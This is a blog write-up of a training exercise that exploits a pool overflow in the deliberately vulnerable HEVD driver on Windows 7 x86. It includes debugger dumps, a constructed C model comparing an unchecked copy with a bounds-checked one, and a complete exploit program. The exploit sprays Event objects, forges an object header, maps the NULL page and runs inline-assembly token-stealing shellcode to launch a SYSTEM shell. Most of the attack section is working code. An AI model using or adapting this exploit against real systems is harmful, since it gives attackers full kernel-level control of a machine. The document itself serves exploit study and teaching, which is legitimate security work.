
Vulnerability Analysis | HEVD-0x4.PoolOverflow[win7x86]

Posted 2022-07-14 18:48 by rkvir逆向工程學(xué)院 (rkvir Reverse Engineering Academy)

Author: selph

Preface

A peek into the Ring0 vulnerability world: buffer overflows, this time a pool overflow.

Lab environment:

- VM: Windows 7 x86
- Host: Windows 10 x64
- Software: IDA, WinDbg, VS2022


Vulnerability Analysis

This lab covers PoolOverflow. The IRP dispatch function dispatches through a jump table, and the control codes of neighbouring entries differ by 4, so the control code used in this lab is 0x22200f. The code that triggers the vulnerability:

int __stdcall TriggerBufferOverflowNonPagedPool(void *UserBuffer, unsigned int Size)
{
  PVOID PoolWithTag; // ebx

  _DbgPrintEx(0x4Du, 3u, "[+] Allocating Pool chunk\n");
  PoolWithTag = ExAllocatePoolWithTag(NonPagedPool, 0x1F8u, 'kcaH'); // allocate non-paged pool memory
  if ( PoolWithTag )                                                // allocation succeeded: print details
  {
    _DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
    _DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
    _DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%zX\n", 0x1F8u);
    _DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
    ProbeForRead(UserBuffer, 0x1F8u, 1u);         // make sure the input buffer address is readable
    _DbgPrintEx(0x4Du, 3u, "[+] UserBuffer: 0x%p\n", UserBuffer);
    _DbgPrintEx(0x4Du, 3u, "[+] UserBuffer Size: 0x%zX\n", Size);
    _DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer: 0x%p\n", PoolWithTag);
    _DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer Size: 0x%zX\n", 0x1F8u);
    _DbgPrintEx(0x4Du, 3u, "[+] Triggering Buffer Overflow in NonPagedPool\n");
    memcpy(PoolWithTag, UserBuffer, Size);        // copy the input into the allocated memory
    _DbgPrintEx(0x4Du, 3u, "[+] Freeing Pool chunk\n");
    _DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
    _DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
    ExFreePoolWithTag(PoolWithTag, 'kcaH');       // free the memory
    return 0;
  }
  else
  {
    _DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
    return 0xC0000017;
  }
}

At first glance nothing seems wrong: the buffer is filled and the size appears to be limited too. On closer inspection, though, the allocation is 0x1F8 bytes while the copy length comes from user input. It is a classic buffer overflow, except that the buffer lives in non-paged pool memory.


Exploitation

Pool Feng Shui

The kernel pool is the counterpart of the user-mode heap: it is also used to allocate memory dynamically. Because allocation is dynamic, the location of allocated memory is not fixed. In user mode there are techniques such as heap spraying to help overcome dynamic addresses; here we likewise need a way, inside the kernel, to shape the memory pool so that the shellcode can be invoked precisely within the memory region.

The program in this example allocates the user buffer in the non-paged pool, so we need a way to manipulate addresses in the non-paged pool in order to locate the shellcode for execution.

Windows provides the Event object, which is stored in the non-paged pool and is created with the CreateEventA API.

From the paper in reference [2] we learn the following:

Free pool chunks are kept in a linked-list structure. When memory is requested from that pool, a chunk of suitable size is taken from the list and allocated; if none is found, a chunk of similar size is found, split, and then allocated.

When the free list contains free chunks that are adjacent in memory, they are coalesced into one large chunk.

By allocating a large number of Event objects and then freeing some of them with CloseHandle to leave a gap of the right size for the user buffer, the user buffer will very likely land in the hole we carved out, directly adjacent to an Event object. In other words, we can reliably arrange for the user buffer to be immediately followed by an Event object.

This requires two sufficiently large arrays of Event objects: one to consume the small free chunks, the other to carve out the holes offered to the user buffer.

Into the freed holes we insert the vulnerable user buffer.

Diagram (from reference [7]):


Exploitation Principle & Event Object Structure

The exploitation method here differs from the earlier heap overflow that overwrote chunk list pointers. Here the heap overflow is used to forge an object structure, and the forged object is then used to execute shellcode. In one sentence: arrange the buffer directly before an Event object, overwrite it to forge an OBJECT_TYPE header, overwrite the pointer to one of the procedures in OBJECT_TYPE_INITIALIZER, and run shellcode when that procedure is executed. The detailed analysis follows.

First, send a normal input of exactly the right size and look at the pool state:

#include <Windows.h>

int main()
{
    ULONG UserBufferSize = 0x1f8;
    char* UserBuffer = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);
    RtlFillMemory(UserBuffer, UserBufferSize, 0x66);

    HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);

    ULONG WriteRet = 0;
    DeviceIoControl(hDevice, 0x222003 + 4 * 3, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL);

    HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);
    CloseHandle(hDevice);

    return 0;
}

Set a breakpoint on the vulnerable kernel function, run until the buffer allocation has completed, and look at the pool information:

A total of 0x1f8 + 0x8 = 0x200 bytes was allocated (the 8 bytes are the size of the 32-bit pool header). Filling the buffer completely runs right up to the next chunk's pool header, so if an overflow occurs it overwrites the next chunk.

Since what we can control is that the next chunk the overflow runs into is guaranteed to be an Event object structure, first manipulate the user buffer so that it sits right before an Event object, then locate that Event object and inspect it.

The Event object created by the CreateEvent API is 40 bytes, which matches the pool's 0x200-byte size exactly: spray a large number of Event objects, then free 8 of them, which leaves exactly enough room for the buffer. Code:

#include <Windows.h>

int main()
{
    ULONG UserBufferSize = 0x1f8;
    char* UserBuffer = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);
    RtlFillMemory(UserBuffer, UserBufferSize, 0x66);

    HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);

    HANDLE spray_event1[10000] = { 0 };
    HANDLE spray_event2[5000] = { 0 };
    for (size_t i = 0; i < 9999; i++)
    {
        spray_event1[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
    }
    for (size_t i = 0; i < 4999; i++)
    {
        spray_event2[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
    }
    for (size_t i = 0; i < 8; i++)
    {
        CloseHandle(spray_event1[i]);
    }

    ULONG WriteRet = 0;
    DeviceIoControl(hDevice, 0x222003 + 4 * 3, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL);

    HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);
    CloseHandle(hDevice);

    return 0;
}

Look at the pool information:

The buffer has now been placed successfully in a gap inside the memory we allocated in bulk, and you can see it sits right next to the next pool chunk:

Next, look at the information of that next pool chunk:

// pool chunk header
kd> dt nt!_POOL_HEADER 0x8685b708+1f8
   +0x000 PreviousSize     : 0y001000000 (0x40)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001000 (0x8)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4080040      // pool chunk header
   +0x004 PoolTag          : 0xee657645     // pool chunk header
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

// object header quota information
kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 0x8685b708+1f8+8
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40     // non-paged pool
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null)

// object header
kd> dt nt!_OBJECT_HEADER 0x8685b708+1f8+18
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''     // index
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8799cd80 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8799cd80 Void
   +0x014 SecurityDescriptor : (null)
   +0x018 Body             : _QUAD

The TypeIndex here is actually an offset into an array of pointers; that array defines the OBJECT_TYPE of each object:

View the object type:

kd> dt nt!_OBJECT_TYPE 865f59c8
   +0x000 TypeList         : _LIST_ENTRY [ 0x865f59c8 - 0x865f59c8 ]
   +0x008 Name             : _UNICODE_STRING "Event"
   +0x010 DefaultObject    : (null)
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x4a14
   +0x01c TotalNumberOfHandles : 0x4a8a
   +0x020 HighWaterNumberOfObjects : 0x4a19
   +0x024 HighWaterNumberOfHandles : 0x4a8f
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x078 TypeLock         : _EX_PUSH_LOCK
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x865f5a48 - 0x865f5a48 ]

The object type name is Event. Its TypeInfo type information:

kd> dx -id 0,0,881fc560 -r1 (*((ntkrpamp!_OBJECT_TYPE_INITIALIZER *)0x865f59f0))
(*((ntkrpamp!_OBJECT_TYPE_INITIALIZER *)0x865f59f0))                 [Type: _OBJECT_TYPE_INITIALIZER]
    [+0x000] Length           : 0x50 [Type: unsigned short]
    [+0x002] ObjectTypeFlags  : 0x0 [Type: unsigned char]
    [+0x002 ( 0: 0)] CaseInsensitive  : 0x0 [Type: unsigned char]
    [+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x0 [Type: unsigned char]
    [+0x002 ( 2: 2)] UseDefaultObject : 0x0 [Type: unsigned char]
    [+0x002 ( 3: 3)] SecurityRequired : 0x0 [Type: unsigned char]
    [+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
    [+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
    [+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x0 [Type: unsigned char]
    [+0x004] ObjectTypeCode   : 0x2 [Type: unsigned long]
    [+0x008] InvalidAttributes : 0x100 [Type: unsigned long]
    [+0x00c] GenericMapping   [Type: _GENERIC_MAPPING]
    [+0x01c] ValidAccessMask  : 0x1f0003 [Type: unsigned long]
    [+0x020] RetainAccess     : 0x0 [Type: unsigned long]
    [+0x024] PoolType         : NonPagedPool (0) [Type: _POOL_TYPE]
    [+0x028] DefaultPagedPoolCharge : 0x0 [Type: unsigned long]
    [+0x02c] DefaultNonPagedPoolCharge : 0x40 [Type: unsigned long]
    [+0x030] DumpProcedure    : 0x0 : 0x0 [Type: void (*)(void *,_OBJECT_DUMP_CONTROL *)]
    [+0x034] OpenProcedure    : 0x0 : 0x0 [Type: long (*)(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
    [+0x038] CloseProcedure   : 0x0 : 0x0 [Type: void (*)(_EPROCESS *,void *,unsigned long,unsigned long)]
    [+0x03c] DeleteProcedure  : 0x0 : 0x0 [Type: void (*)(void *)]
    [+0x040] ParseProcedure   : 0x0 : 0x0 [Type: long (*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,void * *)]
    [+0x044] SecurityProcedure : 0x840ab5b6 : ntkrpamp!_SeDefaultObjectMethod@36+0x0 [Type: long (*)(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
    [+0x048] QueryNameProcedure : 0x0 : 0x0 [Type: long (*)(void *,unsigned char,_OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
    [+0x04c] OkayToCloseProcedure : 0x0 : 0x0 [Type: unsigned char (*)(_EPROCESS *,void *,void *,char)]

As you can see, the latter part of this structure holds a number of function pointers, and we can pick one of the provided procedures for our own use. Here we choose CloseProcedure at 0x38, which is called when the object is released. Its offset is 0x28 + 0x38 = 0x60. Overwrite that pointer so it points to the shellcode, then release the object: the method is invoked and the shellcode runs.

So the goal is to change the TypeIndex offset from 0xc to 0x0. The first pointer in the array is a null pointer and is never used. Windows 7 has a vulnerability that lets us call NtAllocateVirtualMemory to map the NULL page; we then place the pointer at offset 0x60 pointing at the shellcode address, complete the overflow overwrite, and after that only need to release the object to finish the exploit.
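
Before moving on to the exploit, here is an added C model, written for this page and not the article's or HEVD's own code, of what the _POOL_HEADER dump above shows: it reconstructs chunk A (the 0x1F8-byte buffer plus its 8-byte header) directly followed by the 0x40-byte Event chunk in user mode, decodes the header words 0x04080040 / 0xee657645 from the dump into byte sizes, and contrasts the driver's unchecked copy with a bounds-checked form. The chunk sizes and header bytes come from the dump; the STATUS value returned for a rejected request is an assumption.

```c
#include <stdint.h>
#include <string.h>

/* Constructed user-mode model (not HEVD code) of the two adjacent NonPagedPool chunks in the dump:
 * chunk A = 8-byte _POOL_HEADER + 0x1F8 data (the driver's buffer), then chunk B = the 0x40-byte
 * Event chunk. x86 Ulong1 bits 0..8 = PreviousSize, 16..24 = BlockSize, 25..31 = PoolType (x8 bytes). */
#define HDR    8
#define A_DATA 0x1F8
#define B_SIZE 0x40
#define STATUS_INVALID_BUFFER_SIZE 0xC0000206u  /* assumed status for a rejected request */
/* Chunk B's header bytes exactly as dumped (little-endian Ulong1 0x04080040, PoolTag 0xee657645). */
static const uint8_t EVENT_HDR[HDR] = { 0x40, 0x00, 0x08, 0x04, 0x45, 0x76, 0x65, 0xEE };

typedef struct { unsigned prev_bytes, block_bytes, pool_type; uint32_t tag; } pool_hdr;

static pool_hdr decode_pool_header(const uint8_t *p) {
    uint32_t u = p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24;  /* little-endian Ulong1 */
    pool_hdr h = { (u & 0x1FF) * 8, ((u >> 16) & 0x1FF) * 8, (u >> 25) & 0x7F, 0 };
    h.tag = p[4] | p[5] << 8 | p[6] << 16 | (uint32_t)p[7] << 24;      /* little-endian PoolTag */
    return h;
}

/* The driver's copy (Size is never compared to 0x1F8) and its hardened form. */
static uint32_t copy_unchecked(uint8_t *pool, const uint8_t *user, size_t size) {
    memcpy(pool + HDR, user, size);
    return 0;
}
static uint32_t copy_checked(uint8_t *pool, const uint8_t *user, size_t size) {
    if (size > A_DATA) return STATUS_INVALID_BUFFER_SIZE;
    return copy_unchecked(pool, user, size);
}

/* 1 while chunk B still decodes as PreviousSize 0x200, BlockSize 0x40, NonPagedPool, Event tag. */
static int neighbour_header_intact(const uint8_t *pool) {
    pool_hdr h = decode_pool_header(pool + HDR + A_DATA);
    return h.prev_bytes == HDR + A_DATA && h.block_bytes == B_SIZE && h.pool_type == 2
        && h.tag == 0xEE657645u;
}

/* 0x66 fill at the exploit's 0x1F8+40 length: 1 iff the check rejects it (B intact) and the raw copy corrupts B. */
static int demo(void) {
    uint8_t pool[HDR + A_DATA + B_SIZE], user[A_DATA + 40];
    memset(pool, 0, sizeof pool); memcpy(pool + HDR + A_DATA, EVENT_HDR, HDR);
    memset(user, 0x66, sizeof user);
    int blocked = copy_checked(pool, user, sizeof user) == STATUS_INVALID_BUFFER_SIZE
               && neighbour_header_intact(pool);
    copy_unchecked(pool, user, sizeof user);
    return blocked && !neighbour_header_intact(pool);
}
```

The model array has slack after chunk B, so the unchecked copy stays inside it; what the demo shows is that one oversized request rewrites the neighbouring chunk's header, which is exactly the state the forged object in the exploit relies on.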

#include <Windows.h>
#include <winternl.h>   // NTSTATUS
#include <stdlib.h>     // system()

typedef NTSTATUS(WINAPI* NtAllocateVirtualMemory_t)(IN HANDLE ProcessHandle,
    IN OUT PVOID* BaseAddress,
    IN ULONG      ZeroBits,
    IN OUT PULONG AllocationSize,
    IN ULONG      AllocationType,
    IN ULONG      Protect);


// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET     0x124 // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET    0x050 // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET         0x0B4 // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET       0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET       0x0F8 // nt!_EPROCESS.Token
#define SYSTEM_PID         0x004 // SYSTEM Process PID

VOID TokenStealingPayloadWin7() {
    // Importance of Kernel Recovery
    __asm {
        pushad

        ; get the current process's EPROCESS
        xor eax, eax
        mov eax, fs: [eax + KTHREAD_OFFSET]
        mov eax, [eax + EPROCESS_OFFSET]
        mov ecx, eax

        ; search for the System process's EPROCESS
        mov edx, SYSTEM_PID
        SearchSystemPID :
        mov eax, [eax + FLINK_OFFSET]
        sub eax, FLINK_OFFSET
        cmp [eax + PID_OFFSET], edx
        jne SearchSystemPID

        ; token stealing
        mov edx, [eax + TOKEN_OFFSET]
        mov [ecx + TOKEN_OFFSET], edx

        ; restore state + return
        popad
        mov eax, 1
    }
}

BOOL MapNullPage() {
    HMODULE hNtdll;
    SIZE_T RegionSize = 0x1000;            // will be rounded up to the next host
                                           // page size address boundary -> 0x2000

    PVOID BaseAddress = (PVOID)0x00000001; // will be rounded down to the next host
                                           // page size address boundary -> 0x00000000

    hNtdll = GetModuleHandle(L"ntdll.dll");

    // Grab the address of NtAllocateVirtualMemory
    NtAllocateVirtualMemory_t NtAllocateVirtualMemory;
    NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");

    // Allocate the Virtual memory
    NtAllocateVirtualMemory((HANDLE)0xFFFFFFFF,
        &BaseAddress,
        0,
        &RegionSize,
        MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
        PAGE_EXECUTE_READWRITE);

    FreeLibrary(hNtdll);

    return TRUE;
}

int main()
{
    ULONG UserBufferSize = 0x1f8 + 40;
    PVOID EopPayload = &TokenStealingPayloadWin7;

    HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);

    char* UserBuffer = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);

    // overflow to overwrite a whole Event object
    RtlFillMemory(UserBuffer, UserBufferSize, 0x66);
    PVOID Memory = NULL;
    Memory = (PVOID)((ULONG)UserBuffer + 0x1f8);
    *(PULONG)Memory = (ULONG)0x04080040;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0xee657645;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0x00000000;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0x00000040;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0x00000000;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0x00000000;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0x00000001;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0x00000001;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0x00000000;
    Memory = (PVOID)((ULONG)Memory + 0x4);
    *(PULONG)Memory = (ULONG)0x00080000;

    // map the NULL page and set the pointer
    MapNullPage();
    *(PULONG)0x00000060 = (ULONG)EopPayload;

    // pool spray
    HANDLE spray_event1[10000] = { 0 };
    HANDLE spray_event2[5000] = { 0 };
    for (size_t i = 0; i < 10000; i++)
    {
        spray_event1[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
    }
    for (size_t i = 0; i < 5000; i++)
    {
        spray_event2[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
    }

    // carve out the holes
    for (size_t i = 0; i < 5000; i += 16)
    {
        for (size_t j = 0; j < 8; j++)
        {
            CloseHandle(spray_event2[i + j]);
        }
    }

    // trigger the overflow
    ULONG WriteRet = 0;
    DeviceIoControl(hDevice, 0x222003 + 4 * 3, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL);

    HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);
    UserBuffer = NULL;

    // release the remaining objects
    for (size_t i = 0; i < 10000; i++)
    {
        CloseHandle(spray_event1[i]);
    }

    for (size_t i = 8; i < 5000; i += 16)
    {
        for (size_t j = 0; j < 8; j++)
        {
            CloseHandle(spray_event2[i + j]);
        }
    }

    system("pause");
    system("cmd.exe");

    return 0;
}


Result Screenshot


References

[1] FuzzySecurity | Windows ExploitDev: Part 16 https://www.fuzzysecurity.com/tutorials/expDev/20.html

[2] kernelpool-exploitation.pdf (packetstormsecurity.net) https://dl.packetstormsecurity.net/papers/general/kernelpool-exploitation.pdf

[3] Understanding Pool Corruption Part 1 – Buffer Overflows | Microsoft Docs https://docs.microsoft.com/zh-cn/archive/blogs/ntdebugging/understanding-pool-corruption-part-1-buffer-overflows

[4] Understanding Pool Corruption Part 2 – Special Pool for Buffer Overruns | Microsoft Docs https://docs.microsoft.com/zh-cn/archive/blogs/ntdebugging/understanding-pool-corruption-part-2-special-pool-for-buffer-overruns

[5] Understanding Pool Corruption Part 3 – Special Pool for Double Frees | Microsoft Docs https://docs.microsoft.com/zh-cn/archive/blogs/ntdebugging/understanding-pool-corruption-part-3-special-pool-for-double-frees

[6] [Translation] Windows Kernel Vulnerability Study: Kernel Pool Attack Principles, Wwoc's blog, CSDN https://blog.csdn.net/qq_38025365/article/details/106291907

[7] [Translation] Windows Kernel Exploitation Tutorial Part 4: Pool Feng-Shui -> Pool Overflow, Pediy forum (bbs.pediy.com) https://bbs.pediy.com/thread-223719.htm

[8] CreateEventA function (synchapi.h) - Win32 apps | Microsoft Docs https://docs.microsoft.com/zh-cn/windows/win32/api/synchapi/nf-synchapi-createeventa?redirectedfrom=MSDN

